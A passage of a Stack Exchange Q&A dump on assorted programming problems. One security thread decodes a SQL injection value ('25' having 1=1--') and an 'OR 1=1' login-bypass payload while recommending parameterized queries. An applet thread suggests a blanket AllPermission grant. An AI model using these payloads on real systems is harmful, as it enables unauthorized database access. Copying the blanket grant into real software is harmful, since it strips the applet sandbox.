applets?\nComment: The applet will need to be digitally signed prior to deployment so you might as well add signing to the build script. Editing policy files is pointless. BTW - does the applet open a socket connection to it's own server (the one that supplied the applet to the user)?\nAnswer: Go to command line and type policytool it will open editor to create policy file now add permissions on policy file whatever you like and save file with name .java.policy in user home directory. It will be enough to provide permission to your applet.\nComment: can explain more because this my 1st time with applets\nComment: It is simple as I mentioned in steps, Just run policytool and add permission there is lot of permission when you run the tool you will get understand they are simple. finally use file menu save the policy in file just to remember that your file name should be .java.policy and location should be your user home directory.\nComment: If you want to grant all permission than copy this text in your policy file - grant {\n permission java.security.AllPermission;\n};\nComment: I knew this one, but I want to specify my own applet by this code not all applets when I added < grant codebase\"http:\/\/localhost:8090\/ProjectStage\/applet.jar\" { permission java.security.AllPermission; } it didn't work for me\n","meta":{"source":"stackoverflow","title":"how to grant permission to my applet","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to show custom table row() when there is no data(initial and after searching) in data-tables | datatables | jQuery\n\nQuestion: I am using data tables in my project and using the ajax option to fetch the data for the data table but I want to show the custom table row in case of the empty table, and different table row in case of no records after perform searching.\n<code>$('#clients-list-table').DataTable({\n \"processing\": true,\n \"lengthChange\": false,\n \"pageLength\": 10,\n \"ajax\": {\n \"url\": SITE_URL + \"\/clients\",\n \"contentType\": \"application\/json\",\n \"type\": \"GET\"\n },\n \"columns\": [\n { \"data\": \"name\" },\n { \"data\": \"email\" },\n { \"data\": \"tax_id\", \"searchable\": false, \"orderable\": false },\n { \"data\": \"phone\", \"searchable\": false, \"orderable\": false },\n {\n \"orderable\": false,\n \"searchable\": false,\n \"data\": null,\n \"defaultContent\": \"\",\n \"mRender\": function ( data, type, row ) {\n actionTd = '<i class=\"fa fa-sort-desc action-btn\" class=\"dropdown-toggle\" data-toggle=\"dropdown\"><\/i>';\n actionTd += '<div class=\"dropdown-menu\"><ul>';\n actionTd += '<li><a href=\"javascript:void(0);\">View<\/a><\/li>';\n actionTd += '<li><a href=\"'+SITE_URL+'\/clients\/'+data.id+'\/edit\">Edit<\/a><\/li>';\n actionTd += '<li><a class=\"delete_resource\" data-resource=\"destroy-client-form-'+data.id+'\" href=\"'+SITE_URL+'\/clients\/'+data.id+'\">Delete<\/a><form method=\"POST\" action=\"'+SITE_URL+'\/clients\/'+data.id+'\" accept-charset=\"UTF-8\" id=\"destroy-client-form-'+data.id+'\" style=\"display: none\"><input name=\"_method\" type=\"hidden\" value=\"DELETE\"><input name=\"_token\" type=\"hidden\" value=\"'+$('meta[name=\"csrf-token\"]').attr('content')+'\"><\/form><\/li>';\n actionTd += '<\/ul><\/div>';\n return actionTd;\n }\n },\n ],\n render: function ( data, type, row, meta ) {\n console.log(data.length);\n },\n rowCallback: function (row, data) {\n console.log(data);\n },\n \"oLanguage\": { \n \"sZeroRecords\": '<div class=\"message\"><p>You have not yet create a new client!<\/p><\/div><div class=\"invoice-btns\"><a href=\"'+SITE_URL+'\/clients\/create\" class=\"btn-custom\"><i class=\"fa fa-plus\" aria-hidden=\"true\"><\/i> New Client <\/a><\/div>' \n }\n});\n<\/code>\nCurrent HTML showing the following table row by using the above sZeroRecords option\n<code><tr class=\"odd\">\n <td valign=\"top\" colspan=\"5\" class=\"dataTables_empty\">\n <div class=\"message\"><p>You have not yet create a new client!<\/p><\/div>\n <div class=\"invoice-btns\"><a href=\"http:\/\/localhost\/kedas\/clients\/create\" class=\"btn-custom\"><i class=\"fa fa-plus\" aria-hidden=\"true\"><\/i> New Client <\/a><\/div>\n <\/td>\n<\/tr>\n<\/code>\nBut I want to show the following HTML in case of no record\n<code><tr class=\"no-data-row\">\n <td colspan=\"7\" rowspan=\"2\" align=\"center\">\n <div class=\"message\"><p>You have not yet create a new client!<\/p><\/div>\n <div class=\"invoice-btns\">\n <a href=\"'+SITE_URL+'\/clients\/create\" class=\"btn-custom\"><i class=\"fa fa-plus\" aria-hidden=\"true\"><\/i> New Client <\/a>\n <\/div>\n <\/td>\n<\/tr>\n<\/code>\nAfter perform Searching it showing the same but I want to show some different table row like below\n<code><tr class=\"no-search-data\">\n <td colspan=\"7\" rowspan=\"2\" align=\"center\">\n <div class=\"message\"><p>There is no records match with your searchin<\/p><\/div>\n <\/td>\n<\/tr>\n<\/code>\nAnswer: Actually you were pretty close. Look at my example:\n\n<code>var jsonData = [\n { \n \"Name\": \"Tiger Nixon\",\n \"Position\": \"System Architect\",\n \"Office\": \"Edinburgh\",\n \"Age\": 61,\n \"StartDate\": \"2011\/04\/25\",\n \"Salary\": \"$320,800\"\n },\n { \n \"Name\": \"Garrett Winters\",\n \"Position\": \"Accountant\",\n \"Office\": \"Tokyo\",\n \"Age\": 63,\n \"StartDate\": \"2011\/07\/25\",\n \"Salary\": \"$170,750\"\n },\n { \n \"Name\": \"Ashton Cox\",\n \"Position\": \"Junior Technical Author\",\n \"Office\": \"San Francisco\",\n \"Age\": 66,\n \"StartDate\": \"2009\/01\/12\",\n \"Salary\": \"$86,000\"\n }\n];\n\nvar jsonData2 = []\n\nvar table = $('#example').DataTable({\n processing: true,\n lengthChange: false,\n pageLength: 10,\n language: {\n \/\/zeroRecords: '<div class=\"fa-3x\"><i class=\"fas fa-cog fa-spin\"><\/i><\/div>',\n \/\/emptyTable: '<div class=\"fa-3x\"><i class=\"fas fa-spinner fa-spin\"><\/i><\/div>'\n \/\/ zeroRecords: '<div class=\"message\"><p>There is no records match with your searchin<\/p><\/div>'\n },\n data: jsonData2, \/\/ replace with jsonData for records\n drawCallback: function( settings ) {\n var api = this.api();\n var searchText = api.search();\n var currentPageDataSet = api.rows( {page:'current'} ).data();\n\n if (searchText != '' && currentPageDataSet.length == 0) {\n var $tbody = $('#example tbody');\n $tbody.empty();\n var $tr = $('<tr class=\"no-search-data\" role=\"row\"><\/tr>'); \n $tr.append('<td colspan=\"5\" rowspan=\"2\" align=\"center\"><div class=\"message\"><p>There is no records match with your searching<\/p><\/div><\/td>');\n $tbody.append($tr); \n } else if (currentPageDataSet.length == 0) {\n var $tbody = $('#example tbody');\n $tbody.empty();\n var $tr = $('<tr role=\"row\" class=\"no-data-row\"><\/tr>'); \n $tr.append('<td colspan=\"5\" rowspan=\"2\" align=\"center\"><div class=\"message\"><p>You have not yet create a new supplier!<\/p><\/div><div class=\"invoice-btns\"><a href=\"#\" class=\"btn-custom\"><i class=\"fa fa-plus\" aria-hidden=\"true\"><\/i> New Client <\/a><\/div><\/td>');\n $tbody.append($tr);\n }\n },\n columns: [\n { data: 'Name' },\n { data: 'Position' },\n { data: 'Office' },\n { data: 'Age' },\n { data: 'StartDate' },\n { data: 'Salary' }\n ]\n});<\/code>\n<code><link href=\"https:\/\/cdn.datatables.net\/1.10.21\/css\/jquery.dataTables.min.css\" rel=\"stylesheet\"\/>\n<link href=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/font-awesome\/5.14.0\/css\/all.min.css\" rel=\"stylesheet\"\/>\n\n<script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/jquery\/1.12.4\/jquery.min.js\"><\/script>\n<script src=\"https:\/\/cdn.datatables.net\/1.10.21\/js\/jquery.dataTables.min.js\"><\/script>\n\n<table id=\"example\" class=\"display\" style=\"width:100%\">\n <thead>\n <tr>\n <th>Name<\/th>\n <th>Position<\/th>\n <th>Office<\/th>\n <th>Age<\/th>\n <th>Start date<\/th>\n <th>Salary<\/th>\n <\/tr>\n <\/thead>\n<\/table>\n<br><br>\n<table id=\"example2\" class=\"display\" style=\"width:100%\">\n <thead>\n <tr>\n <th>Name<\/th>\n <th>Position<\/th>\n <th>Office<\/th>\n <th>Age<\/th>\n <th>Start date<\/th>\n <th>Salary<\/th>\n <\/tr>\n <\/thead>\n<\/table><\/code>\nComment: Can you please tell me how can I change the class of empty tr? As I need but it coming as \nComment: @SachinKumar: I'm sorry. I misunderstood your issue. I edited my example. Could you check it out, please?\nComment: I think you should use the condition something like this \n\nif (searchText != '' && currentPageDataSet.length == 0) {\n ...\n} else if (currentPageDataSet.length == 0) {\n ...\n}\nComment: Any way you do a great job. At least tell me the useful option for the data table.\nComment: @SachinKumar: The problem if I use your proposed condition, how would you know which class (**no-search-data** or **no-data-row**) to inject to the tag?\nComment: No look at your condition you just check if the search input is not empty then simply show the tr. but what about after searching you have some records. It means according to your condition it will always show the same result(empty tr) even there are some records to show after searching.(#example2 example)\n","meta":{"source":"stackoverflow","title":"How to show custom table row() when there is no data(initial and after searching) in data-tables | datatables | jQuery","dup_signals":{}},"subset":"stackexchange"} +{"text":"PlaySound works in Visual Studio but not in standalone exe\n\nQuestion: I am trying to play a wav file in C++ using Visual Studio.\nI put file \"my.wav\" in my project directory and use the code\n<code>PlaySound(TEXT(\"my.wav\"), NULL, SND_FILENAME | SND_SYNC);\n<\/code>\nI hit the play button (or F5 or even Ctrl-F5) and it plays the sound fine.\nI open a command prompt and go to Debug\/ and run MyApp.exe and when it runs it plays the error chime.\nNote: Ideally the sound would be bundled in the exe so I can just distribute the exe and it would work. I tried putting it in an Resource.rc but the code I see in all the examples\n<code>PlaySound( (char*)IDR_WAVE1, NULL, SND_RESOURCE | SND_SYNC );\n<\/code>\ndoesn't even compile for me. Complains about IDR_WAVE1 even though that is the name of my resource.\nComment: You are using a relative path (*\"my.wav\"*). The current working directory set by Visual Studio is different from the current working directory, when launched from a command prompt. Either bundle the WAV as a resource, or use fully qualified paths.\nComment: Isn't `IDR_WAVE1` just an integer identifying a resource?\nComment: Are you sure you are doing this [how it should be done](https:\/\/msdn.microsoft.com\/en-us\/library\/windows\/desktop\/dd743679(v=vs.85).aspx)?\nComment: Link it as a resource. Don't just try to do that, fail, give up, and adopt a much worse solution. Linking files as resources is easy.\nComment: @wix. I had tried to follow that resource you mention, but ended up with the described behavior. I then found three other examples on the internet (all mostly similar but slightly different) and tried to mimic those, with no better results. So, no, I am quite sure I am not doing this how I should. That's why I put it on Stack Overflow.\nAnswer: As I recall it you need to 'link' the resource file with a resource script file \".rc file\" in Visual Studio to embed it inside the .exe file. Otherwise you need to load it like @wilx points out.\nAnswer: I'm a little rusty on old school win32 but it was something like this:\ninclude resource.h in your file and use MAKEINTRESOURCE\n<code>PlaySound(MAKEINTRESOURCE(IDR_WAVE1), NULL, SND_RESOURCE | SND_SYNC );\n<\/code>\nComment: I had tried that already, but tried it again after your answer and realized my mistake. I actually had two resource files (because I'm clueless to Visual Studio) and including resource.h wasn't helping because I needed to include resource1.h. I collapsed my two resource files to one and it works now as a resource.\nComment: Technically, IInspectable is the one who answered by original question of why it doesn't work when run as .exe, but he answered it as a comment and you solved my problem, so marking yours as the correct solution.\n","meta":{"source":"stackoverflow","title":"PlaySound works in Visual Studio but not in standalone exe","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to reset all states when property value is changed from javascript?\n\nQuestion: I am using stencil framework. In my component I am using different states to trigger different events. I am also updating the property value of component from javascript. \nI would like to reset all states value and reload the component with updated property value. \nNew property value is responsible for many actions like calling api, generating the cache key etc.\nCan anyone suggest me the best approach to fulfill my requirement. Currently I am reset all the states in watcher method of property and call the componentWillLoad event but I am facing many issue in this approach.\nSample code\n<code>@Prop() symbol!: string;\n @Watch('symbol')\n symbolChanged(newSymbol: string, prevSymbol: string) {\n if (newSymbol && newSymbol !== prevSymbol) {\n this.resetStates();\n }\n }\n resetStates() {\n \/\/Reset all state values here\n this.componentWillLoad();\n }\n<\/code>\nComment: Sounds to me like you're trying to put too much logic into that component. Anyway, maybe it's easier to create a new component instance when the value changes? You can use a different `key` on your component to make sure the old one doesn't get reused (for info about `key` see https:\/\/stenciljs.com\/docs\/templating-jsx#loops).\nComment: @SimonH\u00e4nisch by setting key property on each symbol change would work for me. Thank you very much for your suggestion.\nAnswer: By setting key property on root element of render method would solve my issue like below code snippet.\n<code> uniqKeyId = uniqid.get();\n\n @Prop() symbol!: string;\n @Watch('symbol')\n sysmbolWatcher(newSymbol: string, prevSysmbol: string) {\n if (newSymbol != prevSysmbol) {\n \/\/update key attribute each switch of exchange\n this.uniqKeyId = uniqid.get();\n \/\/Set default values based on properties as to consider this as fresh request.\n this.setDefaultValues();\n }\n }\n<\/code>\nAnd in render method like below \n<code> render() { \n return ( \n <section class=\"cid-minichart\" key={this.uniqKeyId}>\n \/\/Render markup\n <\/section>\n );\n }\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to reset all states when property value is changed from javascript?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How do I prevent this type of SQL injection attack?\n\nQuestion: Our company has been using several tool (Veracode, Appscan, etc) to verify that our applications meet minimum security requirements. I have inherited a legacy application which has several flaws. I've managed to mitigate most of the vulnerabilities, but am having troubles fixing this next one because I simply do not know what it is doing. In our report, it seems that it is changing one of our POST variables to\n<code>25%27+having+1%3D1--+\n<\/code>\nWhat is this and what is it effectively doing? What can I do to prevented by this type of attack?\nComment: parametrized quires, like every other sql injection ever.\nComment: If you want the least amount of work to resolve this (or any) vulnerability, toggle the system's oh-enn\/oh-eff-eff discriminator.\nComment: Normally, I would, but this is a very old application that we do not plan on having around much longer. Time I spend on this application is basically a waste of time at this point, so the bare minimum work possible is desired.\nAnswer: When this string is decoded from its url-encoded form it becomes the following:\n<code>25' having 1=1--\n<\/code>\nThis string, when placed as is into, for example, the following (PHP) database query function:\n<code>mysql_query(\"SELECT * FROM users WHERE username = '$username'\");\n<\/code>\nBecomes this:\n<code>mysql_query(\"SELECT * FROM users WHERE username = '25' having 1=1--'\");\n<\/code>\nNote here that the %27 (') breaks out of the argument in the WHERE clause and continues the executable part of the statement. The -- after 1=1 makes the rest of the statement a comment which is not executed.\nThe HAVING statement in SQL is supposed to be used within queries which use the GROUP BY operator, and should fail in queries which do not. My guess here is that this string is being used to check simply for the presence of an unsanitised variable which gets placed into an executed query.\nTo prevent this type of attack I would suggest using a good input sanitation function, or parameterised queries. The implementation of this depends on the programming environment in question.\nAddition: The normal use of 1=1 in SQL injection queries is to cause all rows to be returned, voiding any other WHERE conditions. An example input could be:\n<code>a' OR 1=1 --\n<\/code>\nWhen inserted as the $password parameter in a query such as:\n<code>SELECT * FROM users WHERE username = '$username' AND password = '$password'\n<\/code>\nThe statement becomes:\n<code>SELECT * FROM users WHERE username = 'mark' AND password = 'a' OR 1=1 --\n<\/code>\nThe resulting dataset will include all entries in the 'users' table, as 1=1 is always true.\nComment: This is called URL encoding (or apparently [Percent Encoding](http:\/\/en.wikipedia.org\/wiki\/Percent-encoding)). It is used so that characters which would normally interfere with the address bar (?, \/, etc) can be placed into URLs without being interpreted for their normal meaning.\nComment: @drjimbob Hrrrrrrk, I wouldn't ever trust that regex. For a start, what about cases where you _want_ to store content that might have apostrophes and other punctuation? Even if you're just sticking to alphanumeric content, you can still alter the behaviour of a query via injection of unexpected content, causing subtle potentially-exploitable bugs. Parameterised queries are the **only** proper solution, since they treat data as data and query language as query language; they're separate entitites entirely. If your DBMS or driver can't handle them, switch to one that can immediately.\nComment: Great, so what causes `%27` to be evaluated to `'`? What encoding is this and are there other encodings that I should be aware of?\nComment: @Jeff, the issue isn't really related to the encoding, rather it has to do with the fact the (decoded) parameter contains a quote, and isn't escaped.\nComment: Bound parameters aka parameterized query is the optimal solution. Its risky to trust any input sanitation you wrote yourself, as that's rolling your own security which is a bad idea and a clever attacker may be able to get through. Also bound parameters generally run faster, unless some queries benefit greatly from a different execution plan that a smart DB can figure out without bound parameters [[1]](http:\/\/use-the-index-luke.com\/sql\/where-clause\/bind-parameters). If thats the case, make sure your input sanitation just whitelists safe input; e.g., filters out chars not in `[A-Za-z0-9 ]`.\nComment: @Polynomial - I recommended bound parameters and in practice never encountered the situation where the pre-planned execution plan create a bottleneck that had to be fixed. Yes, my regex wouldn't let you search for `J.J.`, `Green-Ellis`, `O'Neill` or `Erd\u0151s` and coupled with bad SQL strings could fail (`SELECT * from mytable where name={user_input};` with no quotes around `'{user_input}'`). But a simple let's replace `'` with `\\'` may fail for complicated reasons (e.g., unicode characters got mapped to `'` or you didn't map `\\` to `\\\\`) or they found some way to bypass your input sanitation.\nAnswer: what you're seeing there is a fairly standard SQL Injection attack vector. The code it's adding can modify SQL statements if the input isn't handled correctly by the application (but I guess you worked that out from the title). There's a good description of the problem which mentions this vector in this paper from NGS\/NCC.\nIn terms of mitigating the problem you'll need to ensure that input to the application is appropriately validated or escaped so that it can't modify the underlying SQL queries to the database.\nA good place to start with this would be the OWASP SQL Injection Cheetsheet\nAnswer: The alternative to a parameterized query is to escape the input. How you do this correctly will depend on your platform and database. For example, on PHP and with the mysql database use mysql_real_escape_string(). Also, if you do this you must always use single quotes in the SQL, even for numbers. \nYou might think that you can just replace single quotes in a string to make it safe, but that is not sufficient. Single quotes can be represented in other ways. More detail here: Multibyte character exploits - PHP\/MySQL\n","meta":{"source":"security.stackexchange","title":"How do I prevent this type of SQL injection attack?","dup_signals":{}},"subset":"stackexchange"} +{"text":"\"This package should not be accessible on Python 3\" error\n\nQuestion: I installed phenix (phenix-installer-1.17.1-3660-intel-linux-2.6-x86_64-centos6) on my CentOS 7 system according the installation guide (https:\/\/www.phenix-online.org\/documentation\/install-setup-run.html). The original python version (\/usr\/bin\/python) in my system is 2.7.5, but I installed anaconda3, so the output of \"which python\" command is \"~\/software\/build\/anaconda3\/bin\/python\".\nI tried to study the p9-sad tutorial and run the command \"phenix.run_example p9-sad\", but it gave the following error information:\n<code>Examples to be run: p9-sad\n\nRunning PHENIX example: p9-sad Fri Jan 17 15:04:44 CST 2020\n\nWorking directory: \/home\/sunyp\/Documents\/tutorial\/PHENIX\/p9-sad\nStarting run now ... please wait a moment\nError processing line 1 of \/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/site-packages\/google_auth-1.7.1-py3.6-nspkg.pth:\n\nFatal Python error: initsite: Failed to import the site module\nTraceback (most recent call last):\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/site.py\", line 168, in addpackage\n exec(line)\n File \"<string>\", line 1, in <module>\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/importlib\/util.py\", line 14, in <module>\n from contextlib import contextmanager\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/contextlib.py\", line 5, in <module>\n from collections import deque\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/collections\/__init__.py\", line 27, in <module>\n from reprlib import recursive_repr as _recursive_repr\n File \"\/home\/sunyp\/software\/Phenix\/phenix-1.17.1-install\/phenix-1.17.1-3660\/conda_base\/lib\/python2.7\/site-packages\/reprlib\/__init__.py\", line 7, in <module>\n raise ImportError('This package should not be accessible on Python 3. '\nImportError: This package should not be accessible on Python 3. Either you are trying to run from the python-future src folder or your installation of python-future is corrupted.\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n File \"\/home\/sunyp\/software\/Phenix\/phenix-1.17.1-install\/phenix-1.17.1-3660\/build\/..\/conda_base\/lib\/python2.7\/site-packages\/site.py\", line 73, in <module>\n __boot()\n File \"\/home\/sunyp\/software\/Phenix\/phenix-1.17.1-install\/phenix-1.17.1-3660\/build\/..\/conda_base\/lib\/python2.7\/site-packages\/site.py\", line 22, in __boot\n loader.load_module('site')\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/site.py\", line 570, in <module>\n main()\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/site.py\", line 557, in main\n known_paths = addsitepackages(known_paths)\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/site.py\", line 349, in addsitepackages\n addsitedir(sitedir, known_paths)\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/site.py\", line 207, in addsitedir\n addpackage(sitedir, name, known_paths)\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/site.py\", line 178, in addpackage\n import traceback\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/traceback.py\", line 3, in <module>\n import collections\n File \"\/home\/sunyp\/software\/build\/anaconda3\/lib\/python3.7\/collections\/__init__.py\", line 27, in <module>\n from reprlib import recursive_repr as _recursive_repr\n File \"\/home\/sunyp\/software\/Phenix\/phenix-1.17.1-install\/phenix-1.17.1-3660\/conda_base\/lib\/python2.7\/site-packages\/reprlib\/__init__.py\", line 7, in <module>\n raise ImportError('This package should not be accessible on Python 3. '\nImportError: This package should not be accessible on Python 3. Either you are trying to run from the python-future src folder or your installation of python-future is corrupted.\n<\/code>\nDoes it mean that phenix requires python2 rather python3, but there is python3 in my system, so the error came out? And how to solve the problem? Thank you in advance.\nRegards,\nYeping Sun\nAnswer: Solely based on <code>\/home\/sunyp\/software\/Phenix\/phenix-1.17.1-install\/phenix-1.17.1-3660\/conda_base\/lib\/python2.7\/site-packages\/reprlib\/__init__.py<\/code> Phenix contains a Python 2.7 environment.\nYou could maybe try running your code with <code>\/home\/sunyp\/software\/Phenix\/phenix-1.17.1-install\/phenix-1.17.1-3660\/conda_base\/bin\/python<\/code> or something to use that Python interpreter, but it's hard to tell since Phenix source is not openly available.\nComment: Thank you. But how to set the the python interpreter to that shipped with Phenix?\nAnswer: Your environment probably contains path to python2.7.5\nCheck your <code>PYTHONPATH<\/code>\nThis doesn't work with Python 3 for obvious reasons. To remove it:\n<code>unset PYTHONPATH\n<\/code>\nComment: Thank you. I have tried \"unset PYTHONPATH\", but it doesn't work and the same error comes out.\nComment: Add the output of `env | egrep -i 'python|virtualenv'` to your question\n","meta":{"source":"stackoverflow","title":"\"This package should not be accessible on Python 3\" error","dup_signals":{}},"subset":"stackexchange"} +{"text":"Making Guzzle HTTP POST Request in Laravel\n\nQuestion: I am trying to make a post request to the example <code>url endpoint<\/code> but I keeping running into this weird error <code>\"The GET method is not supported for this route. Supported methods: POST.\"<\/code> Bellow is my code route and controller code:\nRoute Snippet:\n<code>Route::post('\/posts', 'PostController@store')->name('store');<\/code>\nController Snippet:\n<code>public function store(){\n $client = new \\GuzzleHttp\\Client();\n $url = \"https:\/\/cdc-npin.lndo.site\/api\/nhtd-event\/json\";\n $response = $client->post($url, [\n 'form_params' => [\n 'key1' => 'value1',\n 'key2' => 'value2',\n 'key3' => 'value3',\n 'key4' => 'value4',\n ]\n ]);\n dd($response\n<\/code>\nWhat am I not doing correctly??\nComment: Typo fix, it's `dd($response);` and not `dd($response`\nComment: Can you post the form that submits to this store method? I suspect the error is coming before you even get to the Guzzle client\nAnswer: This is not form value;\n<code>'form_params' => [\n 'key1' => 'value1',\n 'key2' => 'value2',\n 'key3' => 'value3',\n 'key4' => 'value4',\n ]\n<\/code>\nwith form values, controller looks like \n<code> public function store(Request $request){\n $client = new \\GuzzleHttp\\Client();\n $url = \"https:\/\/cdc-npin.lndo.site\/api\/nhtd-event\/json\";\n $response = $client->post($url, [\n 'form_params' => [\n 'first_name' => $request->get('first_name'),\n 'last_name' => $request->get('last_name'),\n 'email' => $request->get('email'),\n 'job_title' => $request->get('job_title'),\n 'city' => $request->get('city'),\n 'country' => $request->get('country')\n ]\n ]);\n dd($response);\n }\n<\/code>\nand the form looks like:\n<code><form method=\"post\" action=\"{{ route('store') }}\">\n @csrf\n <div class=\"form-group\"> \n <label for=\"first_name\">First Name:<\/label>\n <input type=\"text\" class=\"form-control\" name=\"first_name\"\/>\n <\/div>\n\n <div class=\"form-group\">\n <label for=\"last_name\">Last Name:<\/label>\n <input type=\"text\" class=\"form-control\" name=\"last_name\"\/>\n <\/div>\n\n <div class=\"form-group\">\n <label for=\"email\">Email:<\/label>\n <input type=\"text\" class=\"form-control\" name=\"email\"\/>\n <\/div>\n <div class=\"form-group\">\n <label for=\"city\">City:<\/label>\n <input type=\"text\" class=\"form-control\" name=\"city\"\/>\n <\/div>\n <div class=\"form-group\">\n <label for=\"country\">Country:<\/label>\n <input type=\"text\" class=\"form-control\" name=\"country\"\/>\n <\/div>\n <div class=\"form-group\">\n <label for=\"job_title\">Job Title:<\/label>\n <input type=\"text\" class=\"form-control\" name=\"job_title\"\/>\n <\/div> \n <button type=\"submit\" class=\"btn btn-primary-outline\">Add contact<\/button>\n <\/form>\n<\/code>\nComment: I'm not sure that this is the problem since it should be causing an error in template rendering but you have a typo in your form definition in the action attribute. `route(store')` should be `route('store')`\nComment: Not the cause of the problem definitely!\nAnswer: \"The GET method is not supported for this route. Supported methods: POST.\" Not is the output of \n<code>dd($reponse);\n<\/code>\nI guess that you have a problem with the Form that calls the route Post::store, your form seems like make a GET Request instead a POST Request, cause the error is from controller not of Guzzle.\nI see your form, the form and method is correct...\nWhat if you change the constructor of Guzzle by\n<code>$client = new \\GuzzleHttp\\Client();\n$response = $client->request('POST', 'https:\/\/cdc-npin.lndo.site\/api\/nhtd-event\/json', [\n 'form_params' => [\n 'first_name' => $request->get('first_name'),\n 'last_name' => $request->get('last_name'),\n 'email' => $request->get('email'),\n 'job_title' => $request->get('job_title'),\n 'city' => $request->get('city'),\n 'country' => $request->get('country')\n ]\n]);\n<\/code>\nComment: The error goes away when I remove `dd($reponse);` but when I visit my enpoint url, I don't see the newly submitted data. Why is my data not registering?\nComment: You make the endpoint? you can post here the Route and Controller that handle this URL https:\/\/cdc-npin.lndo.site\/api\/nhtd-event\/json ?\n","meta":{"source":"stackoverflow","title":"Making Guzzle HTTP POST Request in Laravel","dup_signals":{}},"subset":"stackexchange"} +{"text":"Interpolation[] gives negative values when all the initial data is positive\n\nQuestion: I have this data:\n<code> data4[100]={{99.98`, 1.477804748224006`}, {99.98010000000001`, \n 2365.0750456414803`}, {99.98020000000001`, \n 7388.983990539655`}, {99.9803`, 12214.415228382633`}, {99.9804`, \n 14703.728757320594`}, {99.9805`, \n 13833.517124715048`}, {99.98060000000001`, \n 9910.24843752318`}, {99.9807`, 4572.062808475352`}, {99.9808`, \n 570.8108232836022`}, {99.9809`, \n 1360.4394093799826`}, {99.98100000000001`, \n 10546.858200868768`}, {99.9811`, 31276.246551027016`}, {99.9812`, \n 65650.1254789103`}, {99.9813`, \n 114254.56416369356`}, {99.98140000000001`, \n 175877.45012692566`}, {99.9815`, 247463.43115736826`}, {99.9816`, \n 324324.10569403647`}, {99.9817`, 400585.6434020496`}, {99.9818`, \n 469822.1456480918`}, {99.9819`, 525795.5336175732`}, {99.982`, \n 563205.5837321972`}, {99.9821`, 578349.5929231215`}, {99.9822`, \n 569600.9007249621`}, {99.9823`, 537638.1255371793`}, {99.9824`, \n 485389.5506534906`}, {99.9825`, 417695.34242114425`}, {99.9826`, \n 340728.91596566234`}, {99.9827`, 261252.42488402053`}, {99.9828`, \n 185805.19866843504`}, {99.9829`, 119934.45681939927`}, {99.983`, \n 67573.04382586862`}, {99.98310000000001`, \n 30649.601122680797`}, {99.98320000000001`, \n 8984.93375823133`}, {99.98330000000001`, \n 488.57590847085385`}, {99.9834`, 1627.1205800512662`}, {99.9835`, \n 8096.737603320689`}, {99.98360000000001`, \n 15602.028881503466`}, {99.98370000000001`, \n 20626.473373518827`}, {99.9838`, 21078.87118582859`}, {99.9839`, \n 16715.90414629784`}, {99.98400000000001`, \n 9271.330417955402`}, {99.98410000000001`, \n 2263.4817347905678`}, {99.9842`, 499.00930637276855`}, {99.9843`, \n 9335.824909593328`}, {99.98440000000001`, \n 33805.42443036627`}, {99.98450000000001`, \n 77718.79959836493`}, {99.9846`, 142887.136511969`}, {99.9847`, \n 228577.00679417455`}, {99.9848`, 331290.87329430395`}, {99.9849`, \n 444921.04587067786`}, {99.985`, 561274.3394688623`}, {99.9851`, \n 670912.5821721719`}, {99.9852`, 764208.0275593415`}, {99.9853`, \n 832479.363953682`}, {99.9854`, 869058.3616487961`}, {99.9855`, \n 870142.0041714903`}, {99.9856`, 835310.0610613178`}, {99.9857`, \n 767630.5596346757`}, {99.9858`, 673329.9921983734`}, {99.9859`, \n 561064.1071001278`}, {99.986`, \n 440880.5960885422`}, {99.98610000000001`, \n 323009.09572123486`}, {99.98620000000001`, \n 216640.19370923933`}, {99.98630000000001`, \n 128859.40940812681`}, {99.9864`, 63883.29183825436`}, {99.9865`, \n 22704.86291029975`}, {99.98660000000001`, \n 3199.7311446716553`}, {99.98670000000001`, \n 679.7731520971815`}, {99.9868`, 8817.201777734488`}, {99.9869`, \n 20807.144107481454`}, {99.98700000000001`, \n 30599.608320206604`}, {99.98710000000001`, \n 34017.603224111605`}, {99.9872`, 29589.91591126962`}, {99.9873`, \n 18963.736616762995`}, {99.98740000000001`, \n 6819.466464542636`}, {99.98750000000001`, \n 280.1958293620077`}, {99.9876`, 7881.952610961169`}, {99.9877`, \n 38237.52969319436`}, {99.98780000000001`, \n 98576.85395021607`}, {99.9879`, 193372.72190030565`}, {99.988`, \n 323257.87767462275`}, {99.9881`, 484407.14150474017`}, {99.9882`, \n 668500.2152456209`}, {99.9883`, 863304.0960842049`}, {99.9884`, \n 1.0538288292973272`*^6}, {99.9885`, \n 1.223928369892497`*^6}, {99.9886`, \n 1.358151069349844`*^6}, {99.9887`, \n 1.4436018537197143`*^6}, {99.9888`, \n 1.471567167555936`*^6}, {99.9889`, \n 1.4386770107031108`*^6}, {99.989`, \n 1.3474337251571033`*^6}, {99.98910000000001`, \n 1.206018054152098`*^6}, {99.98920000000001`, \n 1.0273789719875318`*^6}, {99.98930000000001`, \n 827711.9871653258`}, {99.9894`, 624517.4470547661`}, {99.9895`, \n 434493.3112763912`}, {99.98960000000001`, \n 271546.2668802631`}, {99.98970000000001`, \n 145195.83424830047`}, {99.9898`, 59597.975846536276`}, {99.9899`, \n 13333.424807004074`}, {99.99000000000001`, \n 1.4778548374239222`}, {99.99010000000001`, \n 9546.365930991567`}, {99.9902`, 30136.213755790428`}, {99.9903`, \n 50329.26450484372`}, {99.99040000000001`, \n 61211.43650049187`}, {99.99050000000001`, \n 58181.79375774372`}, {99.9906`, 